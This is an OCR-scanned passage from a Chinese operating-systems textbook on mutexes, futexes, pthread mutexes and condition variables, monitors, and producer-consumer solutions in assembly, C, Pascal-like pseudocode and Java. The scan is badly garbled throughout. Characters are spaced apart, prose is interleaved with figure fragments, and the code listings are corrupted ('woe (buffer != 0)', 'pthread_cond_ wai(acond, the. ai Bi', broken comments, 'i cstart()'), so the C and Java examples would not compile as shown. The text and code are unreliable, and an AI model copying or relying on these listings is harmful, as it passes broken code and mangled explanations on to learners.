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互 斥 量 是 一 个 可 以 处 于 两 态 之 一 的 变量 : 解锁 和 加 锁 。 这 样 ， 只 需要 一 个 二 进 制 位 表示 它 ， 不 过 实 
际 上 ， 常 常 使 用 一 个 整 型 量 ，0 表 示 解 锁 ， 而 其 他 所 有 的 值 则 表示 加 锁 。 互 斥 量 使 用 两 个 过 程 。 当 一 个 
线程 (或 进程 ) 需要 访问 临界 区 时 ， 它 调用 mutex_lock。 如 果 该 互 斥 量 当 前 是 解锁 的 〈 即 临界 区 可 用 )， 
此 调用 成 功 ， 调 用 线程 可 以 自由 进入 该 临界 区 。 

另 一 方面 ， 如 果 该 互 斥 量 已 经 加 锁 ， 调 用 线程 被 阻塞 ， 直 到 在 临界 区 中 的 线程 完成 并 调用 
mutex_unlock。 如 果 多 个 线程 被 阻塞 在 该 互 斥 量 上 ， 将 随机 选择 一 个 线程 并 允许 它 获 得 锁 。 

由 于 互 斥 量 非常 简单 ， 所 以 如 果 有 可 用 的 TSL 或 XCHG 指 令 ， 就 可 以 很 容易 地 在 用 户 空间 中 实现 它 
们 。 用 于 用 户 级 线程 包 的 mutex_lock 和 mutex_unlock 代 码 如 图 2-29 所 示 。XCHG 解 法 本 质 上 是 相同 的 。 


mutex _lock: 
TSL REGISTER,MUTEX | 将 互 斥 信号 量 复 制 到 寄存 器 ， 并 且 将 互 斥 信号 量 置 为 1 
CMP REGISTER,#0 1 互 斥 信号 量 是 0 吗 ? 
JZE ok | 如 果 互 斥 信号 量 为 0， 它 被 解锁 ， 所 以 返回 
CALL thread_yield 1 互 斥 信号 量 忙 ， 调 度 另 一 个 线程 
JMP mutex_lock 1 稍 后 再 试 


ok: RET 1 返回 调用 者 ， 进入 临界 区 


mutex_unlock: 
MOVE MUTEX,#0 { mutex # 40 


RET 1 返回 调用 者 





图 2-29 mutex_lock 和 mutex_unlock 的 实现 


mutex_lock 的 代码 与 图 2-25 中 enter_region 的 代码 很 相似 ， 但 有 一 个 关键 的 区 别 。 当 enter_region 进 
入 临界 区 失败 时 ， 它 始终 重复 测试 锁 〈 忙 等 待 ) 。 实 际 上 ， 由 于 时 钟 超时 的 作用 ， 会 调度 其 他 进程 运行 。 
这 样 迟 早 拥有 锁 的 进程 会 进入 运行 并 释放 锁 。 

在 HF) 线程 中 ， 情 形 有 所 不 同 ， 因 为 没有 时 钟 停 止 运行 时 间 过 长 的 线程 。 结 果 是 通过 忙 等 待 的 
方式 来 试图 获得 锁 的 线程 将 永远 循环 下 去 ， 决 不 会 得 到 锁 ， 因 为 这 个 运行 的 线程 不 会 让 其 他 线程 运行 从 
而 释放 锁 。 

以 上 就 是 enter_region 和 mutex_lock 的 差别 所 在 。 在 后 者 取 锁 失败 时 ， 它 调用 thread_yield 将 CPU 放 
弃 给 另 一 个 线程 。 这 样 ， 就 没有 忙 等 待 。 在 该 线程 下 次 运行 时 ， 它 再 一 次 对 锁 进 行 测试 。 

由 于 thread_yield 只 是 在 用 户 空 间 中 对 线程 调度 程序 的 一 个 调用 ， 所 以 它 的 运行 非常 快捷 。 这 样 ， 
mutex_lock 和 mutex_unlock 都 不 需要 任何 内 核 调用 。 通 过 使 用 这 些 过 程 ， 用 户 线程 完全 可 以 实现 在 用 户 
空间 中 的 同步 ， 这 些 过 程 仅仅 需要 少量 的 指令 。 

上 面 所 叙述 的 互 斥 量 系统 是 一 套 调 用 框架 。 对 于 软件 来 说 ， 总 是 需要 更 多 的 特性 ， 而 同步 原 语 也 不 
例外 。 例 如 ， 有 时 线程 包 提供 一 个 调用 mutex_trylock， 这 个 调用 或 者 获得 锁 或 者 返回 失败 码 ， 但 并 不 阻 
塞 线程 。 这 就 给 了 调用 线程 一 个 灵活 性 ， 用 以 决定 下 一 步 做 什么 ， 是 使 用 替代 办 法 还 只 是 等 待 下 去 。 

到 目前 为 止 ， 我 们 掩盖 了 一 个 问题 ， 不 过 现在 还 是 有 必要 把 这 个 问题 提出 来 。 在 用 户 级 线程 包 中 ， 
多 个 线程 访问 同一 个 互 斥 量 是 没有 问题 的 ， 因 为 所 有 的 线程 都 在 一 个 公共 地 址 空间 中 操作 。 但 是 ， 对 于 
大 多 数 早期 解决 方案 ， 诸 如 Peterson 算 法 和 信号 量 等 ， 都 有 一 个 未 说 明 的 前 提 ， 即 这 些 多 个 进程 至 少 应 
该 访问 一 些 共享 内 存 ， 也 许 仅仅 是 一 个 字 。 如 果 进 程 有 不 连续 的 地 址 空间 ， 如 我 们 始终 提 到 的 ， 那 么 在 
Peterson 算 法 、 信 号 量 或 公共 缓冲 区 中 ， 它 们 如 何 共 享 turn 变 量 呢 ? 

有 两 种 方案 。 第 一 种 ， 有 些 共享 数据 结构 ， 如 信号 量 ， 可 以 存放 在 内 核 中 ， 并 且 只 能 通过 系统 调用 
来 访问 。 这 种 处 理 方式 化 解 了 上 述 问 题 。 第 二 种 ， 多 数 现代 操作 系统 (包括 UNIX 和 Windows) 提供 一 
种 方法 ， 让 进程 与 其 他 进程 共享 其 部 分 地 址 空间 。 在 这 种 方法 中 ， 缓 冲 区 和 其 他 数据 结构 可 以 共享 。 在 
最 坏 的 情形 下 ， 如 果 没 有 可 共享 的 途径 ， 则 可 以 使 用 共享 文件 。 

如 果 两 个 或 多 个 进程 共享 其 全 部 或 大 部 分 地 址 空间 ， 进 程 和 线程 之 间 的 差别 就 变 得 模糊 起 来 ， 但 无 论 
怎样 ， 两 者 的 差别 还 是 有 的 。 共 享 一 个 公共 地 址 空间 的 两 个 进程 仍旧 有 各 自 的 打开 文件 、 定 时 器 以 及 其 他 
一 些 单个 进程 的 特性 ， 而 在 单个 进程 中 的 线程 ， 则 共享 进程 全 部 的 特性 。 另 外 ， 共 享 一 个 公共 地 址 空间 的 
多 个 进程 决 不 会 拥有 用 户 级 线程 的 效率 ， 这 一 点 是 不 容 置疑 的 ， 这 是 因为 内 核 还 同 其 管理 密切 相关 。 
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1. 快速 用 户 区 互 斥 量 futex 

随 着 并 行 的 增加 ， 有 效 的 同步 和 锁 机 制 对 性 能 而 言 非常 重要 。 如 果 等 待 时 间 短 的 话 ， 自 旋 锁 会 很 快 ， 
但 如 果 等 待 时 间 长 ， 则 会 浪费 CPU 周期 。 如 果 有 很 多 竞争 ， 那 么 阻塞 此 进程 ， 并 仅 当 锁 被 释放 的 时 候 让 
内 核 解除 阻塞 会 更 加 有 效 。 然 而 ， 这 却 带 来 了 相反 的 问题 ， 它 在 竞争 激烈 的 情况 下 效果 不 错 ， 但 如 果 一 
开始 只 有 很 小 的 竞争 ， 那 么 不 停 地 内 核 切换 将 花 销 很 大 。 更 粳 的 是 ， 预 测 锁 竞争 的 数量 并 不 容易 。 

一 个 引 人 和 人 注意 的 致力 于 结合 两 者 优点 的 解决 方案 称 作 “futex”"， 或 者 “快速 用 户 空 间 互 斥 ”。futex 
是 Linux 的 一 个 特性 ， 它 实现 了 基本 的 锁 (很 像 互 斥 锁 ) ,但 避免 了 陷入 内 核 ， 除非 它 真 的 不 得 不 这 样 做 。 
因为 来 回 切换 到 内 核 花 销 很 大 ， 所 以 这 样 做 可 观 地 改善 了 性 能 。 一 个 futex 包 含 两 个 部 分 : 一 个 内 核 服务 
和 一 个 用 户 库 。 内 核 服务 提供 一 个 等 待 队 列 ， 它 允许 多 个 进程 在 一 个 锁 上 等 待 。 它 们 将 不 会 运行 ， 除 非 
内 核 明 确 地 对 它们 解除 阻塞 。 将 一 个 进程 放 到 等 待 队 列 需要 (代价 很 大 的 ) 系统 调用 ， 我 们 应 该 避免 这 
种 情况 。 因 此 ， 没 有 竞争 时 ，futex 完 全 在 用 户 空间 工作 。 特 别 地 ， 这 些 进程 共享 通用 的 锁 变 量 一 一 一 个 
对 齐 的 32 位 整数 锁 的 专业 术语 。 假 设 锁 初 始 值 为 1， 即 假设 这 意味 着 锁 是 释放 状态 。 线 程 通过 执行 原子 
操作 “减少 并 检验 ”来 夺取 锁 (Linux 的 原子 函数 包含 封装 在 C 语 言 函数 中 的 内 联 汇 编 并 定义 在 头 文件 中 )。 
接 下 来 ， 这 个 线程 检查 结果 ， 看 锁 是 否 被 释放 。 如 果 未 处 于 被 锁 状 态 ， 那 么 一 切 顺 利 ， 我 们 的 线程 成 功 
夺取 该 锁 。 然 而 ， 如 果 该 锁 被 另 一 个 线程 持 有 ， 那 么 线程 必须 等 待 。 这 种 情况 下 ，futex 库 不 自 旋 ， 而 是 
使 用 一 个 系统 调用 把 这 个 线程 放 在 内 核 的 等 待 队列 上 。 可 以 期 望 的 是 ， 切 换 到 内 核 的 开销 已 是 合乎 情理 
的 了 ， 因 为 无 论 如 何 线程 被 阻塞 了 。 当 一 个 线程 使 用 完 该 锁 ， 它 通过 原子 操作 “增加 并 检验 ”来 释放 锁 ， 
并 检查 结果 ， 看 是 否 仍 有 进程 阻塞 在 内 核 等 待 队列 上 。 如 果 有 ， 它 会 通知 内 核 可 以 对 等 待 队列 里 的 一 个 
或 多 个 进程 解除 阻塞 。 如 果 没有 锁 竞 争 ， 内 核 则 不 需要 参与 其 中 。 

2. pthread 中 的 互 斥 量 

Pthread 提 供 许 多 可 以 用 来 同步 线程 的 函数 。 其 基本 机 制 是 使 用 一 个 可 以 被 锁定 和 解锁 的 互 斥 量 来 
保护 每 个 临界 区 。 一 个 线程 如 果 想 要 进入 临界 区 ， 它 首先 尝试 锁 住 相关 的 互 斥 量 。 如 果 互 斥 量 没有 加 锁 ， 
那么 这 个 线程 可 以 立即 进入 ， 并 且 该 互 斥 量 被 自动 锁定 以 防止 其 他 线程 进入 。 如 果 互 斥 量 已 经 被 加 锁 ， 
则 调用 线程 被 阻塞 ， 直 到 该 互 斥 量 被 解锁 。 如 果 多 个 线程 在 等 待 同 一 个 互 斥 量 ， 当 它 被 解锁 时 ， 这 些 等 
待 的 线程 中 只 有 一 个 被 允许 运行 并 将 互 斥 量 重新 锁定 。 这 些 互 斥 锁 不 是 强制 性 的 ， 而 是 由 程序 员 来 保证 
线程 正确 地 使 用 它们 。 

与 互 斥 量 相关 的 主要 函数 调用 如 图 2-30 所 示 。 就 像 所 期 待 的 那样 ， 可 以 创建 和 撤销 互 斥 量 。 实 现 它 们 
的 函数 调用 分 别 是 pthread_mutex_init 与 pthread_mutex_destroy。 也 可 以 通过 pthread_mutex_lock 给 互 斥 量 加 
锁 ， 如 果 该 互 斥 量 已 被 加 锁 时 ， 则 会 阻塞 调用 者 。 还 有 一 个 调用 可 以 用 来 尝试 锁 住 一 个 互 斥 量 ， 当 互 斥 量 
已 被 加 锁 时 会 返回 错误 代码 而 不 是 阻塞 调用 者 。 这 个 调用 就 是 pthread_mutex_trylock。 如 果 需 要 的 话 ， 该 调 
用 允许 一 个 线程 有 效 地 忙 等 待 。 最 后 ，pthread_mutex_unlock 用 来 给 一 个 互 斥 量 解 锁 ， 并 在 一 个 或 多 个 线程 
等 待 它 的 情况 下 正确 地 释放 一 个 线程 。 互 斥 量 也 可 以 有 属性 ， 但 是 这 些 属性 只 在 某 些 特殊 的 场合 下 使 用 。 

除 互 斥 量 之 外 ，pthread 提 供 了 另 一 种 同步 机 制 : 条 件 变量 。 互 斥 量 在 允许 或 阻塞 对 临界 区 的 访问 上 
是 很 有 用 的 ， 条 件 变量 则 人 允许 线程 由 于 一 些 未 达到 的 条 件 而 阻塞 。 绝 大 部 分 情况 下 这 两 种 方法 是 一 起 使 
用 的 。 现 在 让 我 们 进一步 地 研究 线程 、 互 斥 量 、 条 件 变量 之 间 的 关联 。 

举 一 个 简单 的 例子 ， 再 次 考虑 一 下 生产 者 -消费 者 问题 : 一 个 线程 将 产品 放 在 一 个 缓冲 区 内 ， 由 另 
一 个 线程 将 它们 取出 。 如 果 生 产 者 发 现 缓冲 区 中 没有 空 槽 可 以 使 用 了 ， 它 不 得 不 阻塞 起 来 直到 有 一 个 空 
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图 2-30 一 些 与 互 斥 量 相关 的 pthread 调 用 图 2-31 一 些 与 条 件 变量 相关 的 pthread 调 用 


槽 可 以 使 用 。 生 产 者 使 用 互 斥 量 可 以 进行 原子 性 检查 ， 而 不 受 其 他 线程 干扰 。 但 是 当 发 现 缓冲 区 已 经 满 
了 以 后 ， 生 产 者 需要 一 种 方法 来 阻塞 自己 并 在 以 后 被 唤醒 。 这 便 是 条 件 变 量 做 的 事 了 。 

图 2-31 给 出 了 与 条 件 变量 相关 的 最 重要 的 pthread 调 用 。 就 像 你 可 能 期 待 的 那样 ， 这 里 有 专门 的 调用 
用 来 创建 和 撤销 条 件 变量 。 它 们 可 以 有 属性 ， 并 且 有 不 同 的 调用 来 管理 它们 (图 中 没有 给 出 )。 条 件 变 
量 上 的 主要 操作 是 pthread_cond_wait 和 pthread_cond_signal， 前 者 阻塞 调用 线程 直到 另 一 其 他 线程 向 它 
发 信号 (使 用 后 一 个 调用 )。 当 然 ， 阻塞 与 等 待 的 原因 不 是 等 待 与 发 信号 协议 的 一 部 分 。 被 阻塞 的 线程 
经 常 是 在 等 待 发 信号 的 线程 去 做 某 些 工作 、 释 放 某 些 资 源 或 是 进行 其 他 的 一 些 活 动 。 只 有 完成 后 被 阻塞 
的 线程 才 可 以 继续 运行 。 条 件 变量 允许 这 种 等 待 与 阻塞 原子 性 地 进行 。 当 有 多 个 线程 被 阻塞 并 等 待 同一 
个 信号 时 ， 可 以 使 用 pthread_cond_broadcast 调 用 。 

条 件 变 量 与 互 斥 量 经 常 一 起 使 用 。 这 种 模式 用 于 让 一 个 线程 锁 住 一 个 互 斥 量 ， 然 后 当 它 不 能 获得 它 
期 待 的 结果 时 等 待 一 个 条 件 变 量 。 最 后 另 一 个 线程 会 向 它 发 信号 ， 使 它 可 以 继续 执行 
pthread_cond_wait 原 子 性 地 调用 并 解锁 它 持 有 的 互 斥 量 。 由 于 这 个 原因 ， 互 斥 量 是 参数 之 一 。 

值得 指出 的 是 ， 条 件 变 量 (不 像 信号 量 ) 不 会 存在 内 存 中 。 如 果 将 一 个 信号 量 传递 给 一 个 没有 线程 
在 等 待 的 条 件 变 量 ， 那 么 这 个 信号 就 会 丢失 。 程 序 员 必须 小 心 使 用 避免 丢失 信号 。 

作为 如 何 使 用 一 个 互 斥 量 与 条 件 变 量 的 例子 ， 图 2-32 展 示 了 一 个 非常 简单 只 有 一 个 缓冲 区 的 生产 


#include <stdio.h> 

#include <pthread.h> 

#define MAX 1000000000 /需要 生产 的 数量 */ 

pthread_mutex_t the_mutex; 

pthread_cond_t conde, condp; 

int buffer = 0; 六 生产 者 消费 者 使 用 的 缓冲 区 */ 

void “producer(void *ptr) 彤 生产 数据 */ 

{ int i; 

for (i= 1; i <= MAX; i++) { 

pthread_mutex_lock(&the_mutex); /* 互 斥 使 用 缓冲 区 */ 
woe (buffer != 0) pthread_cond_wait(&condp, &the_mutex); 
buffer = i; /* x */ 
pthread_cond_signal(&condc); a PREMA = 
pthread_mutex_unlock(&the mutex); A/* 释 放 缓 冲 区 */ 


} 
pthread_exit(0); 


void *consumer(void *ptr) I* 消费 数据 */ 
{ int i; 
for (i = 1; i <= MAX; i++) { 

pthread_mutex_lock(&the_mutex); */ 
while (buffer ==0) pthread_cond_ wai(acond, the. ai Bi 
buffer = 0; tae | 
pthread_cond_signal(&condp); p 唤醒 生 
pthread_mutex_unlock(&the_mutex); /* Fans A 


} 
pthread_exit(0); 


int main(int argc, char **argv) 
{ 


pthread_t pro, con; 
pthread_mutex_init(&the_mutex, 0); 
pthread_cond_init(&condc, 0); 
pthread_cond_init(&condp, 0); 
pthread_create(&con, 0, consumer, 0); 
pthread_create(&pro, 0, producer, 0); 
pthread_join(pro, 0); 
pthread_join(con, 0); 
pthread_cond_destroy(&condc); 
pthread_cond_destroy(&condp); 
pthread_mutex_destroy(&the_ mutex); 





图 2-32 利用 线程 解决 生产 者 一 消费 者 问题 
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者 一 消费 者 问题 。 当 生产 者 填 满 缓冲 区 时 ， 它 在 生产 下 一 个 数据 项 之 前 必须 等 待 ， 直 到 消费 者 清空 了 它 。 
类 似 地 ， 当 消费 者 移 走 一 个 数据 项 时 ， 它 必须 等 待 ， 直 到 生产 者 生产 了 另外 一 个 数据 项 。 尽 管 很 简单 ， 
这 个 例子 却说 明了 基本 的 机 制 。 使 一 个 线程 睡眠 的 语句 应 该 总 是 要 检查 这 个 条 件 ， 以 保证 线程 在 继续 执 
行 前 满足 条 件 ， 因 为 线程 可 能 已 经 因为 一 个 UNIX 信 号 或 其 他 原因 而 被 唤醒 。 


2.3.7 管 程 

有 了 信号 量 和 互 斥 量 之 后 ， 进 程 间 通信 和 看 来 就 很 容易 了， 实际 是 这 样 的 吗 ? 答案 是 否定 的 。 请 仔细 
考察 图 2-28 中 向 缓冲 区 放 入 数据 项 以 及 从 中 删除 数据 项 之 前 的 down 操 作 。 假 设 将 生产 者 代码 中 的 两 个 
down 操 作 交 换 一 下 次 序 ， 将 使 得 mutex 的 值 在 empty 之 前 而 不 是 在 其 之 后 被 减 1。 如 果 缓 冲 区 完全 满 了 ， 
生产 者 将 阻塞 ，mutex 值 为 0。 这 样 一 来 ， 当 消费 者 下 次 试图 访问 缓冲 区 时 ， 它 将 对 mutex 执 行 一 个 down 
操作 ， 由 于 mutex 值 为 0， 则 消费 者 也 将 阻塞 。 两 个 进程 都 将 永远 地 阻塞 下 去 ， 无 法 再 进行 有 效 的 工作 ， 
这 种 不 幸 的 状况 称 作 死 锁 (dead lock) 。 我 们 将 在 第 6 章 中 详细 讨论 死 锁 问题 。 

指出 这 个 问题 是 为 了 说 明 使 用 信号 量 时 要 非常 小 心 。 一 处 很 小 的 错误 将 导致 很 大 的 麻烦 。 这 就 像 用 
汇编 语言 编程 一 样 ， 甚 至 更 糟 ， 因 为 这 里 出 现 的 错误 都 是 竞争 条 件 、 死 锁 以 及 其 他 一 些 不 可 预测 和 不 可 
再 现 的 行为 。 

为 了 更 易于 编写 正确 的 程序 , Brinch Hansen (1973) me 
和 Hoare (1974) 提出 了 一 种 高 级 同步 原 语 ， 称 为 管 程 oe 
(monitor)。 在 下 面 的 介绍 中 会 发 现 ， 他 们 两 人 提出 的 方 
案 略 有 不 同 。 一 个 管 程 是 一 个 由 过 程 、 变 量 及 数据 结构 
等 组 成 的 一 个 集合 ， 它 们 组 成 一 个 特殊 的 模块 或 软件 包 。 
进程 可 在 任何 需要 的 时 候 调 用 管 程 中 的 过 程 ， 但 它们 不 


procedure producer( ); 


end; 





能 在 管 程 之 外 声明 的 过 程 中 直接 访问 管 程 内 的 数据 结 procedure consumer( ); 
构 。 图 2-33 展 示 了 用 一 种 抽象 的 、 类 Pascal 语 言 描述 的 管 ede 二 
程 。 这 里 不 能 使 用 C 语 言 ， 因 为 管 程 是 语言 概念 而 C 语 言 end monitor; 


并 不 支持 它 。 

管 程 有 一 个 很 重要 的 特性 ， 即 任 一 时 刻 管 程 中 只 能 图 2.33 RE 
有 一 个 活跃 进程 ， 这 一 特性 使 管 程 能 有 效 地 完成 互 斥 。 管 程 是 编程 语言 的 组 成 部 分 ， 编 译 器 知道 它们 的 
特殊 性 ， 因 此 可 以 采用 与 其 他 过 程 调用 不 同 的 方法 来 处 理 对 管 程 的 调用 。 和 典型 的 处 理 方法 是 ， 当 一 个 进 
程 调 用 管 程 过 程 时 ， 该 过 程 中 的 前 几 条 指令 将 检查 在 管 程 中 是 否 有 其 他 的 活跃 进程 。 如 果 有 ， 调 用 进程 
将 被 挂 起 ， 直 到 另 一 个 进程 离开 管 程 将 其 唤醒 。 如 果 没 有 活跃 进程 在 使 用 管 程 ， 则 该 调用 进程 可 以 进入 。 

进入 管 程 时 的 互 斥 由 编译 器 负责 ， 但 通常 的 做 法 是 用 一 个 互 斥 量 或 二 元 信号 量 。 因 为 是 由 编译 器 而 
非 程 序 员 来 安排 互 斥 ， 所 以 出 错 的 可 能 性 要 小 得 多 。 在 任 一 时 刻 ， 写 管 程 的 人 无 须 关 心 编译 器 是 如 何 实现 
互 斥 的 。 他 只 需 知道 将 所 有 的 临界 区 转换 成 管 程 过 程 即 可 ， 决 不 会 有 两 个 进程 同时 执行 临界 区 中 的 代码 。 

尽管 管 程 提供 了 一 种 实现 互 斥 的 简便 途径 ， 但 这 还 不 够 ， 还 需要 一 种 办 法 使 得 进程 在 无 法 继续 运行 
时 被 阻塞 。 在 生产 者 一 消费 者 问题 中 ， 很 容易 将 针对 缓冲 区 满 和 缓冲 区 空 的 测试 放 到 管 程 过 程 中 ,但 是 
生产 者 在 发 现 缓冲 区 满 的 时 候 如 何 阻塞 呢 ? 

解决 的 方法 是 引入 条 件 变 量 (condition variables) 以 及 相关 的 两 个 操作 : wait 和 signal。 当 一 个 管 
程 过 程 发 现 它 无 法 继续 运行 时 (例如 ， 生 产 者 发 现 缓冲 区 满 )， 它 会 在 某 个 条 件 变 量 上 (如 full) 执行 
wait 操 作 。 该 操作 导致 调用 进程 自身 阻塞 ， 并 且 还 将 另 一 个 以 前 等 在 管 程 之 外 的 进程 调 入 管 程 。 在 前 面 
介绍 pthread 时 我 们 已 经 看 到 条 件 变量 及 其 操作 了 。 

另 一 个 进程 ， 比 如 消费 者 ， 可 以 唤醒 正在 睡眠 的 伙伴 进程 ， 这 可 以 通过 对 其 伙伴 正在 等 待 的 一 个 条 
件 变 量 执行 signal 完 成 。 为 了 避免 管 程 中 同时 有 两 个 活跃 进程 ， 我 们 需要 一 条 规则 来 通知 在 signal 之 后 
该 怎么 办 。Hoare 建 议 让 新 唤醒 的 进程 运行 ， 而 挂 起 另 一 个 进程 。Brinch Hansen 则 建议 执行 signal 的 进 
程 必须 立即 退出 管 程 ， 即 signal 语 句 只 可 能 作为 一 个 管 程 过 程 的 最 后 一 条 语句 。 这 里 将 采纳 Brinch 
Hansen 的 建议 ， 因 为 它 在 概念 上 更 简单 ， 并 且 更 容易 实现 。 如 果 在 一 个 条 件 变量 上 有 若干 进程 正在 等 
待 ， 则 在 对 该 条 件 变 量 执行 signal 操 作 后 ， 系 统 调度 程序 只 能 在 其 中 选择 一 个 使 其 恢复 运行 。 


进程 与 线程 
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顺便 提 一 下 ， 还 有 一 个 Hoare 和 Brinch Hansen 都 没有 提 及 的 第 三 种 方法 ， 该 方法 让 发 信号 者 继续 运 


行 ， 并且 只 有 在 发 信号 者 退出 管 程 之 后 ， 才 允许 等 待 的 
进程 开始 运行 。 

条 件 变量 不 是 计数 器 ， 条 件 变 量 也 不 能 像 信号 量 那 样 
积累 信号 以 便 以 后 使 用 。 所 以 ， 如 果 向 一 个 条 件 变 量 发 送 
信号 ， 但 是 在 该 条 件 变 量 上 并 没有 等 待 进程 ， 则 该 信号 会 
永远 丢失 。 换 名 话说 ，wait 操 作 必 须 在 signal 之 前 。 这 条 
规则 使 得 实现 简单 了 许多 。 实 际 上 这 不 是 一 个 问题 ， 因 为 
在 需要 时 ， 用 变量 很 容易 跟踪 每 个 进程 的 状态 。 一 个 原本 
要 执行 signal 的 进程 ， 只 要 检查 这 些 变 量 便 可 以 知道 该 操 
作 是否 有 必要 。 

在 图 2-34 中 给 出 了 用 类 Pascal 语 言 ， 通 过 管 程 实现 的 
生产 者 -消费 者 问题 的 解法 框架 。 使 用 类 Pascal 语 言 的 优点 
在 于 清晰 、 简 单 ， 并 且 严 格 符合 Hoare/Brinch Hansen 模 型 。 

读者 可 能 会 觉得 wait 和 signal 操 作 看 起 来 像 前 面 提 到 
的 sleep 和 wakeup， 而 且 已 经 看 到 后 者 存在 严重 的 竞争 
条 件 。 是 的 ， 它 们 确实 很 像 ， 但 是 有 个 很 关键 的 区 别 : 
sleep 和 wakeup 之 所 以 失败 是 因为 当 一 个 进程 想 睡 卢 时 
另 一 个 进程 试图 去 唤醒 它 。 使 用 管 程 则 不 会 发 生 这 种 情 
况 。 对 管 程 过 程 的 自动 互 斥 保证 了 这 一 点 : 如 果 管 程 过 
程 中 的 生产 者 发 现 缓冲 区 满 ， 它 将 能 够 完成 wait 操 作 而 不 
用 担心 调度 程序 可 能 会 在 wait 完 成 之 前 切换 到 消费 者 。 甚 
至 ， 在 wait 执 行 完 成 而 且 把 生产 者 标志 为 不 可 运行 之 前 ， 
根本 不 会 允许 消费 者 进入 管 程 。 

尽管 类 Pascal 是 一 种 想象 的 语言 ， 但 还 是 有 一 些 真 正 
的 编程 语言 支持 管 程 ， 不 过 它们 不 一 定 是 Hoare 和 Brinch 
Hansen 所 设计 的 模型 。 其 中 一 种 语言 是 Java。Java 是 一 种 
面向 对 象 的 语言 ， 它 支持 用 户 级 线程 ， 还 允许 将 方法 
(过 程 ) 划分 为 类 。 只 要 将 关键 字 synchronized 加 入 到 方 
法 声明 中 ，Java 保 证 一 旦 某 个 线程 执行 该 方法 ， 就 不 允许 
其 他 线程 执行 该 对 象 中 的 任何 synchronized 方 法 。 没 有 
关键 字 synchronized， 就 不 能 保证 没有 交错 执行 。 

使 用 Java 管 程 解决 生产 者 -消费 者 问题 的 解法 如 图 





monitor ProducerConsumer 
condition full, empty; 
integer count, 


procedure insert(item: integer); 
begin 

if count = N then wait(full), 

insert_item(item); 

count := count + |; 

if count = | then signal(empty) 
end; 


function remove: integer, 
begin 
if count = 0 then wait(empty); 
remove = remove _item, 
count := count — 1; 
if count = N — | then signal(full) 
end; 


count := 0; 
end monitor; 


procedure producer, 
begin 
while true do 
begin 
item = produce _item, 
ProducerConsumer.insert(item) 


end 
end; 


procedure consumer, 
begin 
while true do 
begin 
item = ProducerConsumer.remove, 
consume _item(item) 
end 
end; 


图 2-34 用 管 程 实现 的 生产 者 一 消费 者 问题 


的 解法 框架 。 一 次 只 能 有 一 个 管 程 
过 程 活跃 。 其 中 的 缓冲 区 有 个 模 


2-35 所 示 。 该 解法 中 有 4 个 类 。 外 部 类 (outer class) ProducerConsumer 创 建 并 启动 两 个 线程 ，p 和 c。 第 
二 个 类 和 第 三 个 类 producer 和 consumer 分 别 包含 生产 者 和 消费 者 的 代码 。 最 后 ， 类 our_monitor 是 管 程 ， 
它 有 两 个 同步 线程 ， 用 于 在 共享 缓冲 区 中 插入 和 取出 数据 项 。 与 前 面 的 例子 不 同 ， 我 们 在 这 里 给 出 了 
insert 和 remove 的 全 部 代码 。 

在 前 面 所 有 的 例子 中 ， 生 产 者 和 消费 者 线程 在 功能 上 与 它们 的 等 同 部 分 是 相同 的 。 生 产 者 有 一 个 无 
限 循环 ， 该 无 限 循环 产生 数据 并 将 数据 放 和 人 公共 缓冲 区 中 ， 消 费 者 也 有 一 个 等 价 的 无 限 循 环 ， 该 无 限 循 
环 从 公共 缓冲 区 取出 数据 并 完成 一 些 有 趣 的 工作 。 

该 程序 中 比较 有 意思 的 部 分 是 类 our_monitor， 它 包含 缓冲 区 、 管 理 变量 以 及 两 个 同步 方法 。 当 生 
产 者 在 insert 内 活动 时 ， 它 确信 消费 者 不 能 在 remove 中 活动 ， 从 而 保证 更 新 变量 和 缓冲 区 的 安全 ， 且 不 
用 担心 竞争 条 件 。 变 量 count 记 录 在 缓冲 区 中 数据 项 的 数量 。 它 的 取 值 可 以 取 从 0 到 N-1 之 间 任 何 值 。 变 
量 1o 是 缓冲 区 槽 的 序号 ， 指 出 将 要 取出 的 下 一 个 数据 项 。 类 似 地 ，hi 是 缓冲 区 中 下 一 个 将 要 放 入 的 数据 
项 序号 。 人 允许 lo = hi， 其 含义 是 在 缓冲 区 中 有 0 个 或 N 个 数据 项 。count 的 值 说 明了 究竟 是 哪 一 种 情形 。 

Java 中 的 同步 方法 与 其 他 经 典 管 程 有 本 质 差 别 : Java 没 有 内 嵌 的 条 件 变 量 。 反 之 ，Java 提 供 了 两 个 
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过 程 wait 和 notify ， 分 别 与 sleep 和 wakeup 等 价 ， 不 过 ， 当 它们 在 同步 方法 中 使 用 时 ， 它 们 不 受 竞争 条 
件 约束 。 理 论 上 ， 方 法 wait 可 以 被 中 断 ， 它 本 身 就 是 与 中 断 有 关 的 代码 。Java 需 要 显 式 表示 异常 处 理 。 
在 本 文 的 要 求 中 ， 只 要 认为 go_to_sleep 就 是 去 睡眠 即 可 。 


public class ProducerConsumer { 
Static final int N = 100; /定义 缓冲 区 大 小 的 常量 
static producer p = new producer(); // 初始 化 一 个 新 的 生产 者 线程 
Static consumer c = new consumer(); // 初始 化 一 个 新 的 消费 者 线程 
static our_monitor mon = new our_monitor(); // 初始 化 一 个 新 的 管 程 


public static void main(String args[]){ 
p.start(); M 开始 生产 者 线程 
i cstart(); N 开始 消费 者 线程 


Static class producer extends Thread { 
public void run() {V run 方 法 包含 了 线程 代码 
int item; 
while (true) { / 生产 者 循环 
item = produce_item(); 
mon.insert(item); 


} 
private int produce_item(){...} /实际 生产 


Static class consumer extends Thread { 
public void run() {/ run 方 法 包含 了 线程 代码 
int item; 
while (true) { ”// 消费 者 循环 
item = mon.remove( ); 
consume _item (item); 


} 


private void consume _item(int item) { … M/ 实际 消费 


static class our_monitor { // 这 是 一 个 管 程 
private int buffer[] = new int[N]; 
private int count = 0, lo = 0, hi = 0; // 计数 器 和 索引 


public synchronized void insert(int val) { 
if (count == N) go_to_sleep(); // 如 果 缓 冲 区 满 ， 则 进入 休眠 
buffer [hi] = val; / 向 缓冲 区 中 插入 一 个 新 的 数据 项 
hi=(hi+1)%N; /设置 下 一 个 数据 项 的 覃 
count= count+ 1 /缓冲 区 中 的 数据 项 又 多 了 一 项 

if (count == 1) notify( ); /如 果 消 费 者 在 休眠 ， 则 将 其 唤醒 


public synchronized int remove( ) { 
int val; 
if (count == 0) go_to_sleep(); // 如 果 缓 冲 区 空 ， 进 入 休眠 
val = buffer [lo]; / 从 缓冲 区 中 取出 一 个 数据 项 
lo=(lo+1)%N; /设置 待 取 数据 项 的 覃 
count = count-1; // 缓冲 区 中 的 数据 项 数目 减少 1 
if (Count == N 一 1) notify(); // 如 果 生 产 者 在 休眠 ， 则 将 其 唤醒 
return val; 
} 
